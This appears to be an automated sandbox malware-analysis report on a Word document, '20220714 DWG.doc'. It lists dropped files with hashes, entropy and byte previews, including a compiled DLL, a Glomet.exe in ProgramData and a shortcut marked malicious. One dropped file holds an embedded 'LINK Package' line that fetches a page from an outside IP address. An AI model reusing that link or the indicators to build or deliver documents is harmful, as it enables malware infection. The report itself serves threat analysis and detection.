                                                                                                                                                                            Preview:<!doctype html>..<html lang="en">.. .. Modified from the Debian original for Ubuntu.. Last updated: 2016-11-16.. See: https://launchpad.net/bugs/1288690.. -->.. <head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.. <title>Apache2 Ubuntu Default Page: It works</title>.. <style type="text/css" media="screen">.. * {.. margin: 0px 0px 0px 0px;.. padding: 0px 0px 0px 0px;.. }.... body, html {.. padding: 3px 3px 3px 3px;.... background-color: #D8DBE2;.... font-family: Verdana, sans-serif;.. font-size: 11pt;.. text-align: center;.. }.... div.main_page {.. position: relative;.. display: table;.... width: 800px;.... margin-bottom: 3px;.. margin-left: auto;.. margin-right: auto;.. padding: 0px 0px 0px 0px;.... border-width: 2px;.. border-color: #212738;.. border-style: solid;.... background-color: #FFFFFF;.... text-align: center;.. }.... div.page_header {.. height: 99px;.. widt
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:PNG image data, 2317 x 3433, 8-bit colormap, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):892832
                                                                                                                                                                            Entropy (8bit):7.982421044887424
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24576:n1yg5B+jHQ89ihbudaSMcKdth3ut3w7mM4nn3:nJzQQ8U4fwdqtb33
                                                                                                                                                                            MD5:D03E61E58D5AD8C605BF20773F992D81
                                                                                                                                                                            SHA1:D6E522722F7E813A32440E5EA6EF613EC56F5385
                                                                                                                                                                            SHA-256:1F57DF9FA9C4A7BA05BF80FA755073C314DFAB1A3C9163810CFC36B375D9BD21
                                                                                                                                                                            SHA-512:3D20F5E5F3391F07CCEC26B05E1B109E43A745FBDEE991C3D658E4706ABEC4BE6A85CB37AB9887C0C22A26B2FC8E4262B72BADD22257B875ABA98F49647FBB77
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1024
                                                                                                                                                                            Entropy (8bit):0.05390218305374581
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2048
                                                                                                                                                                            Entropy (8bit):1.1959987669902177
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:vlAlIcElClTfbobK/Wt56PxZUtdmP//rxZUtalR:il7MClLYKIAZfnjxZxR
                                                                                                                                                                            MD5:2DFA071ED21064A16E213E665D069A70
                                                                                                                                                                            SHA1:A07D9C011D517E6CD6D0E6E065C0DA57802E4033
                                                                                                                                                                            SHA-256:6803C9DF1EA2C0DEB625A798499FE824713ABAC1DFE3D48B66F219073EE05F27
                                                                                                                                                                            SHA-512:E3F2C304576B742AC14835D746857F6DEC839A3333452C8222D20BA8F20317B588AA5590DF3AAE5C9C091092B1D21D41DEC70A5634E9372B46C43AC9D35A67A4
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:LINK Package "http://45.141.237.18/Glomet.html!" "" \b
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:downloaded
                                                                                                                                                                            Size (bytes):13687
                                                                                                                                                                            Entropy (8bit):4.949442412867092
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:mRbRj5lc7cd8d7u55ljNjmOqQPglwy8LIspaMnyuYH3iYmG/N:mXqZc5rHxPgKy8eXmG/N
                                                                                                                                                                            MD5:12BEF5B54D8D40957BDB611DA449C882
                                                                                                                                                                            SHA1:B9F4EA9C1B97F44386485469483A0F603151BAD7
                                                                                                                                                                            SHA-256:05CB7A919383D449B6D9A16A0C44689FCB557982B5DF33C8C28A676F1AD88F06
                                                                                                                                                                            SHA-512:15570BADD82DEF69C039E6740CE8C8D40B497FA43AFA3DBC8B90859E6526DA148CA0F131AF6C2E166757DB5712805C787006209A76387451343586E265604899
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            IE Cache URL:http://45.141.237.18/Glomet.html
                                                                                                                                                                            Preview:<!doctype html>..<html lang="en">.. .. Modified from the Debian original for Ubuntu.. Last updated: 2016-11-16.. See: https://launchpad.net/bugs/1288690.. -->.. <head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.. <title>Apache2 Ubuntu Default Page: It works</title>.. <style type="text/css" media="screen">.. * {.. margin: 0px 0px 0px 0px;.. padding: 0px 0px 0px 0px;.. }.... body, html {.. padding: 3px 3px 3px 3px;.... background-color: #D8DBE2;.... font-family: Verdana, sans-serif;.. font-size: 11pt;.. text-align: center;.. }.... div.main_page {.. position: relative;.. display: table;.... width: 800px;.... margin-bottom: 3px;.. margin-left: auto;.. margin-right: auto;.. padding: 0px 0px 0px 0px;.... border-width: 2px;.. border-color: #212738;.. border-style: solid;.... background-color: #FFFFFF;.... text-align: center;.. }.... div.page_header {.. height: 99px;.. widt
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1364
                                                                                                                                                                            Entropy (8bit):4.107921334408074
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:H3C9AWPavlhHJhKhfII+ycuZhNxYakS+NPNnq9Wd:3WPaf3Khg1ul6a3eq9m
                                                                                                                                                                            MD5:E10D65B42989EE1A81F58BB5BC906C6B
                                                                                                                                                                            SHA1:F37727D9D435E48D8582793BA1AE08B7E95859D9
                                                                                                                                                                            SHA-256:4F474C108A55F638F0C6C74685A787846E17082DA73D026D307B1B4F294E698E
                                                                                                                                                                            SHA-512:B6BA1470FF791335E790F16CC1B7F5D062F6DFDCF26CE87CDE7A062C2C6AA9E49F7F0ED3F5DC6AA5A5525C6553C9704E450E4ADCC13CCFD4BB68660F622FB1CB
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:L......b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........S....c:\Users\user\AppData\Local\Temp\q0vyiohn\CSC14339BC3D3E94BA0AEA5453DEFD3E9E.TMP.................z.{M.#fC..qM............4.......C:\Users\user\AppData\Local\Temp\RES216A.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_26d32acb-2999-4d66-b897-077572d4c005.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...q.0.v.y.i.o.h.n...d.l.l.....(.....L.e.g.a.l.C.o.p.
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1364
                                                                                                                                                                            Entropy (8bit):4.113039111867716
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:Hw4C9AWPdDjQthH/hKhfII+ycuZhNDJakSC+PNnq9Wd:fWPdDEf5Khg1ulDJa3Ciq9m
                                                                                                                                                                            MD5:2784739133C6C05A11DE99F7B435C2B1
                                                                                                                                                                            SHA1:CF2A49552AF4249CF77CA09D64F619693D78EF6D
                                                                                                                                                                            SHA-256:FB8282AC1876F7CAD135B7789342DDBFFB85268169259A6A0BF6FAEF5CAFF0F0
                                                                                                                                                                            SHA-512:109C7EB2D30414C3C23FF3116C4B55F54579907ABE8CFCA84EA746934D7ECA04E1C7FC40D21267C895589EFF9F1DB4D1F7D42ED14EFE9C5A003F8DBEEB8EE933
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:L......b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........S....c:\Users\user\AppData\Local\Temp\ea13q231\CSCF24C6B632D84EA4B9FDE29780CB1444.TMP.....................sz.I...x............4.......C:\Users\user\AppData\Local\Temp\RES3EE5.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_26d32acb-2999-4d66-b897-077572d4c005.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.a.1.3.q.2.3.1...d.l.l.....(.....L.e.g.a.l.C.o.p.
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1364
                                                                                                                                                                            Entropy (8bit):4.092561220070632
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:H/pC9AWPuQFehHRhKhfII+ycuZhNyuakSTvPNnq9Wd:fFWPfFi/Khg1ulyua3Ttq9m
                                                                                                                                                                            MD5:7356D9596592DB2199A07141A43A0D44
                                                                                                                                                                            SHA1:E529C150A28154B1EADFCFAEFA5050D3642C2CC0
                                                                                                                                                                            SHA-256:966BD4F40C736780C7446B95C669AD076888A4CAEF3D13B9C99AFA1B3DC07FDD
                                                                                                                                                                            SHA-512:9D74364036126570CD2D2D819908328FF19BA600123AF6D0220390C94DC083CA86C58BFD665CC0469D0DBEABC97C5D1FED786A5655D8AFF28FBEE148F30C0530
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:L......b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........S....c:\Users\user\AppData\Local\Temp\llhoph4d\CSCA6DEB1F21B847AF87589FE9AEBF81D1.TMP.................wv:...-B.n.m{To..........4.......C:\Users\user\AppData\Local\Temp\RESDEDE.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_26d32acb-2999-4d66-b897-077572d4c005.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.l.h.o.p.h.4.d...d.l.l.....(.....L.e.g.a.l.C.o.p.
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):652
                                                                                                                                                                            Entropy (8bit):3.1146569844572216
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryqlWJak7YnqqJlW+PN5Dlq5J:+RI+ycuZhNDJakSC+PNnqX
                                                                                                                                                                            MD5:B3B8CEB8B98E737A9D49AFC19178CB1F
                                                                                                                                                                            SHA1:1E312CEDF861C940A8185843FB4B094FB29E208E
                                                                                                                                                                            SHA-256:35D0C0A80454C1CC5907E06301B3A5498E93444B1BC5B6CC08494490FE8C8B07
                                                                                                                                                                            SHA-512:39A7E54B8EC5A50A3634E34A6859F1733AA21FBA96C7DA16C7A54834C7BF74121BC6D90ECCC72CDAF876BE36182C5690FDEE2BBBAD2C87226BC4254BECB20D1D
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.a.1.3.q.2.3.1...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...e.a.1.3.q.2.3.1...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):3584
                                                                                                                                                                            Entropy (8bit):3.0913167759627336
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:6t4pqb927GslPwVDRjyJVOKk1ulDJa3Ciq:Ec7GTan5JKC
                                                                                                                                                                            MD5:0CEA21BB0023353D453BB07A7B3B33E2
                                                                                                                                                                            SHA1:2791372A575789C8333EA68F574776F7E0C59408
                                                                                                                                                                            SHA-256:FCD0121789475B5524567C4C6B52267B8D24D25B9C86D3900A0F93C463F75A4B
                                                                                                                                                                            SHA-512:2B5804D9091DBEBFFA3BE253647C24276A9886E5A2A1A55BD14A38DB1722A0277642BC96B067BE1A0027499951A2B9FD4C7FD5A4A29D8B3AE47DA4C92EB00304
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.................%... ...@....... ....................................@..................................$..K....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ..4............................................................0..6....... ....s........o....(....,..o....r...pr...po....*~....*F.r...pr...po....*..(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......t...#Blob...........W=........%3............................................................................2.+...N.B.....................0.....W.......+.............................Q.9.......... \.....P ......j...... ..
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):652
                                                                                                                                                                            Entropy (8bit):3.07986720180676
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryYuak7YnqqTvPN5Dlq5J:+RI+ycuZhNyuakSTvPNnqX
                                                                                                                                                                            MD5:D777763A83B5842D42C86EB96D7B546F
                                                                                                                                                                            SHA1:11A9307069E68F86149C6BD3D8185F2A2EA6DE84
                                                                                                                                                                            SHA-256:4BF71A94F2040EF2A338909302A9735B0531AC4867C715103B695D297C090EA6
                                                                                                                                                                            SHA-512:A2C862F1AD6201072A1987E3D9A7F6D2EF3F42FEBD3185DA68A847EC025DC902498F253FDF3B4A3EEA30D8DE3F83FAC111225278350A69C134AAA5859590F7FE
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.l.h.o.p.h.4.d...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...l.l.h.o.p.h.4.d...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):9728
                                                                                                                                                                            Entropy (8bit):4.795339770730082
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:tKqedmYoNKvUTCSH3gR8H8FgwSHwBOkwZYPaSJ365OdieMjQZagRnIjIuKT:kElNK8TCSfHyPOkwZ+vKOuQZ1nf
                                                                                                                                                                            MD5:915A0B67FBB51FD6188CC5575AF4A6DF
                                                                                                                                                                            SHA1:9FDE28753EF7611847A2CEEE742B7E0FB711DB7F
                                                                                                                                                                            SHA-256:F0B4091339FE2802EAC189218C2588CE0FC1FA905F0A286839CD1964BF813087
                                                                                                                                                                            SHA-512:32837394C4A2A45C1BE0D2BA656E39A0531DC798C93C4347038F04053175B357DEC615003D86099F26970723E730C725E859EA558ACC9ECDF1084C085C9DBD2B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):6656
                                                                                                                                                                            Entropy (8bit):5.1793678932213725
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:AOBtEB2flLkatAthPZJoi9jpfW/er6cBbcB/NFyVOHd0+uHwEX:AhB2flXAVJtjf6cBbcB/N8Ved0PZ
                                                                                                                                                                            MD5:5AA38904ACDCC21A2FB8A1D30A72D92F
                                                                                                                                                                            SHA1:A9CE7D1456698921791DB91347DBA0489918D70C
                                                                                                                                                                            SHA-256:10675F13ABAEE592F14382349AA35D82FB52AAB4E27EEF61D0C83DEC1F6B73DA
                                                                                                                                                                            SHA-512:F04740DA561D7CD0DEA5E839C9E1C339D4A3E63944D3566C94C921A3D170A69918A32DFF3F3B43F13D55CC25A2DBB4C21104F062C324308AC5104179766402A3
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                            • Filename: E-dekont.exe, Detection: malicious
                                                                                                                                                                            • Filename: Requirements.exe, Detection: malicious
                                                                                                                                                                            • Filename: Ziraat Bankasi Swift Mesaji.exe, Detection: malicious
                                                                                                                                                                            • Filename: Ziraat Bankasi Swift Mesaji.exe, Detection: malicious
                                                                                                                                                                            • Filename: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.26675.exe, Detection: malicious
                                                                                                                                                                            • Filename: SecuriteInfo.com.Variant.Tedy.166527.30135.exe, Detection: malicious
                                                                                                                                                                            • Filename: SecuriteInfo.com.ArtemisF2FD6E65491E.4347.exe, Detection: malicious
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):652
                                                                                                                                                                            Entropy (8bit):3.0879498005127113
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryzYak7Ynqq+NPN5Dlq5J:+RI+ycuZhNxYakS+NPNnqX
                                                                                                                                                                            MD5:947AA97B4D8B236643D8A8FD714DCDFC
                                                                                                                                                                            SHA1:CB677780F174368CEA98711BC3715CFA0C7B7ED5
                                                                                                                                                                            SHA-256:C5CDF225AD3F9CD4DE72C3C3CC2028490343490F889238338EDE6A0B076F93B9
                                                                                                                                                                            SHA-512:D9B31CD496CA957E18FB4F5BBD7122A167079CE193C096FC3A417D79C5D583D80695D7C43416ABFA6C0095FFD31EDD3D148DC1FC55D3E0D788F2CE7AC0D2DFE0
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...q.0.v.y.i.o.h.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...q.0.v.y.i.o.h.n...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):5120
                                                                                                                                                                            Entropy (8bit):3.78135442988181
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:63oPhmKraYZkH8KTibUyyjkwjj0JzC+CFSlwY6c1ul6a3eq:JDaAkHHoYjk8CCuW8K
                                                                                                                                                                            MD5:B1041526E4D7DF76C7051D790B5AFC68
                                                                                                                                                                            SHA1:E36DEF95C69EC15279ACB38C4928056778BECCD4
                                                                                                                                                                            SHA-256:F2CB1738D6DC5AA4ED860A5F14C7A15F29DFDD094C6E5180FCEA7AF62572A4F0
                                                                                                                                                                            SHA-512:61E5C811C8E868DEA18377D02C92F7A0229DAF95BCE9B9915770544427C69C02E5E0DD7D2001A1557FAA7AF5F36C07F84BDFF3DA4983479A9F6CB1EF449A3429
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:31:53 2022, mtime=Fri Jul 15 21:26:43 2022, atime=Fri Jul 15 21:26:30 2022, length=952586, window=hide
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1065
                                                                                                                                                                            Entropy (8bit):4.707778520835495
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:8IpNXO+yx6ntEiKfqGWAkZGiDReDmeP7aB6m:8AOpetEi7gkZgDruB6
                                                                                                                                                                            MD5:1A992CB18EE8315E59FE72647A811A51
                                                                                                                                                                            SHA1:57F0641E2DC996B9BF41A0A7058688F41751C920
                                                                                                                                                                            SHA-256:DBFEFDC07E8D4AA4CA5516C534EE2260974783CCC46E5C8C90A9ACA441607BDC
                                                                                                                                                                            SHA-512:FBD6C154C2EC7B3C3656FE002D94B093229DD73E37EAEF5B419242615D91666CE6304EA5F3884F5ACDABB4185823815CF20DB2785DF7323AEC6EF5EABEF1C83A
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Preview:L..................F.... ........3...".........................................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...TG.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....hT....user.<.......Ny..TG......S......................#.h.a.r.d.z.....~.1.....hT....Desktop.h.......Ny..TG......Y..............>......r.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....n.2......TP. .202207~1.DOC..R......hT...TP.....h.....................jX..2.0.2.2.0.7.1.4. .D.W.G...d.o.c.......V...............-.......U...........>.S......C:\Users\user\Desktop\20220714 DWG.doc..'.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.2.0.2.2.0.7.1.4. .D.W.G...d.o.c.........:..,.LB.)...As...`.......X.......445817...........!a..%.H.VZAj................-..!a..%.H.VZAj................-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):83
                                                                                                                                                                            Entropy (8bit):4.730226107310523
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:bDuMJlHnXAGCmX1XfnXAGCv:bCuxFxs
                                                                                                                                                                            MD5:30ED0BEF715E14C5F6D66C801E22F60D
                                                                                                                                                                            SHA1:3F6C93D092BEE372865A225B70A24C64FB15AD96
                                                                                                                                                                            SHA-256:933CA4C6D92C549C547026A1EE3345C621E25B6A494B5C8314B5A317F62A1CDC
                                                                                                                                                                            SHA-512:040E1518A7881B39A7C7CBE98968A9D392B2C5A8F037B4C8FB036C79878B1767DBB8E84F601D9731A5CEBEBE3EE1F40699DAB3D7FFE81E01EB489ACA99E30414
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:[folders]..Templates.LNK=0..20220714 DWG.doc.LNK=0..[doc]..20220714 DWG.doc.LNK=0..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):162
                                                                                                                                                                            Entropy (8bit):2.3757142142596672
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Rl/ZdDYi09Ml/tGc5BlqKamIlp3///r:RtZBYi0ul/RQEEz
                                                                                                                                                                            MD5:2043315C43FD0AE4F95D73D0BFFEB0C9
                                                                                                                                                                            SHA1:76C9954C570AE8713FD58BAA6E84B5D838952EAE
                                                                                                                                                                            SHA-256:A6102FC69A9E9C359AB3D4BCA82036F0A91879577B5D4AAF2008B650E579484D
                                                                                                                                                                            SHA-512:993914D9A9F7B435A839E6AAFE267B7EA587EA751D6200FA9DD09F17C5AC1095E4A9BC7937E57955C02BB28703F434C820C90165A15AB6B5FD89662ACAF36E22
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.pratesh................................................p.r.a.t.e.s.h.........w}...........!..........).......{}..............H.......6C.......}..................
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):162
                                                                                                                                                                            Entropy (8bit):2.3663946154675255
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Rl/ZdDYiVPVlsltGc5BlqKamIlp3///r:RtZBYiSRQEEz
                                                                                                                                                                            MD5:BDADF5ADED5B1978644D4A41EF76B610
                                                                                                                                                                            SHA1:F2086E77EFFE92A36572737F03AF1CEC30FDBDEB
                                                                                                                                                                            SHA-256:BAC06C12955D68FC191286DBC17A48E5ACC3FB99494AD0A691959AC64EB95072
                                                                                                                                                                            SHA-512:FA857E727399D68E0092485E0DF9BE114A61706A8E8FBFD51A2D65FE2A1BB9AE1862210B8FA88FCC8F4E7180CA80289FC1F36168FAD0D7EC6110228D357546C2
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.pratesh................................................p.r.a.t.e.s.h.........w}..........h.j.0...&...).......{}..............H.......6C.......}..................
                                                                                                                                                                            Process:C:\ProgramData\Glomet.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 100x100, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=3], baseline, precision 8, 110x110, frames 3
